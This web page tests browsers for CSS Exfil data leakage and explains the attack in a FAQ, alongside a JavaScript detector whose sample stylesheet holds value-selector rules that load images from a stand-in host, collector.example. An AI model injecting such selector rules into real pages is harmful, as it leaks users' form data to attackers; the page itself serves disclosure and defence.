This page tests to see if your browser is vulnerable to Cascading Style Sheets (CSS) data leakage. If you are vulnerable, one way to protect yourself is to install the CSS Exfil Protection plugin for your browser.
The CSS Exfil vulnerability detailed in this lengthy post is a method attackers can use to steal data from web pages using Cascading Style Sheets (CSS). CSS - one of the building blocks of the modern web - is used by developers to control the look-and-feel of a website and is present on nearly every modern page on the internet. By crafting targeted CSS selectors and injecting them into a web page, an attacker can trick the page into sending pieces of data to a remote server (e.g. usernames, passwords, and sensitive data such as date of birth, social security numbers, and credit card numbers).
This page attempts to load four remote images using CSS selectors which parse a hidden text field. If it is able to load any of those four images your browser is vulnerable to the CSS Exfil attack.
While the CSS Exfil attack doesn't require JavaScript to function, this page requires a few lines of JavaScript to check to see if the exploit succeeded in loading the images.
There is no malicious code on this page. This page simply attempts to use CSS to load four images by checking if a hidden field contains the text 'abc'.
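A defender-side check for the pattern this test exercises, as an added example that is not code from this page or from the CSS Exfil Protection plugin: it scans stylesheet text for rules that pair a selector on an element's value attribute with a remotely loaded url(). The sample stylesheet, the collector.example host and the function name are constructed for illustration.

```javascript
// Added example: flag CSS rules that combine a value-attribute selector with a remote url().
// Heuristic only: the simple rule splitter ignores nested at-rules (@media) and CSS comments.

// Matches [value=...], [value^=...], [value$=...], [value*=...], [value~=...], [value|=...]
const VALUE_SELECTOR = /\[\s*value\s*(?:[\^$*~|]?=)\s*[^\]]*\]/i;
// Matches url(...) pointing at an absolute or protocol-relative (remote) location
const REMOTE_URL = /url\(\s*['"]?\s*(?:https?:)?\/\/[^)'"\s]+/i;

function findExfilCandidates(cssText) {
  const findings = [];
  const rule = /([^{}]+)\{([^{}]*)\}/g; // selector { declarations }
  let m;
  while ((m = rule.exec(cssText)) !== null) {
    const selector = m[1].trim();
    const body = m[2];
    const hit = body.match(REMOTE_URL);
    if (VALUE_SELECTOR.test(selector) && hit) {
      // Strip the leading url( and optional quote so only the target remains
      findings.push({ selector, url: hit[0].replace(/^url\(\s*['"]?\s*/i, '') });
    }
  }
  return findings;
}

// Constructed sample stylesheet (not taken from the test page)
const SAMPLE_CSS = `
input[type="text"] { border: 1px solid #ccc; }
#field[value*="abc"] { background: url(https://collector.example/contains.png); }
#field[value^="a"] { background-image: url("//collector.example/starts.png"); }
input[value=""] { background: url(/static/empty.png); }
.logo { background: url(https://cdn.example/logo.png); }
`;

for (const f of findExfilCandidates(SAMPLE_CSS)) {
  console.log(`suspicious rule: ${f.selector} -> ${f.url}`);
}
```

Only the two rules that both test the field's value and fetch from another host are reported; the same-origin image and the plain remote logo are left alone.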
Maybe. The Chrome and Firefox plugins presented above appear to guard against the type of CSS Exfil attacks presented in the technical write up. Although I am not aware of other methods of exploitation at this time, it doesn't mean that such an attack doesn't exist. As such, the plugins are provided as-is without any warranty or guarantee, under the MIT License. If you discover an attack method which bypasses the plugin I would certainly like to hear from you!
There may be another plugin that is preventing this plugin from working properly. Try disabling all plugins and re-enabling them one at a time. When you find the plugin that's causing the problem, let me know and I'll try to diagnose it and push out an update.
Read the technical write up to understand the anatomy of the vulnerability. At the bottom there is a section: Defense for Website Operators.
I certainly hope not! I'm as much at risk as you. I discovered the attack method described in my technical write up in Fall 2017. It took a while to disclose the vulnerability as I wanted to not only understand the full scope, but provide a solution. The methods detailed are not necessarily new, so there is the possibility that such a technique has been used to harvest user data in the past, so public disclosure is the best path to a more secure web.
Beyond keeping your browser up-to-date and being careful to not click on websites which may be risky or malicious, installing a privacy extension such as Privacy Badger (or alternative) and HTTPS Everywhere can go a long way to protect your safety and privacy online.
The image is a screenshot of an Apple II graphical shareware demo called "DA BIN ICH ...". The demo consists of a Hi-Res portrait of a man who occasionally will wink and stick out his tongue. I wanted to use a quirky image as part of the vulnerability tester, and it's about as quirky as you can get.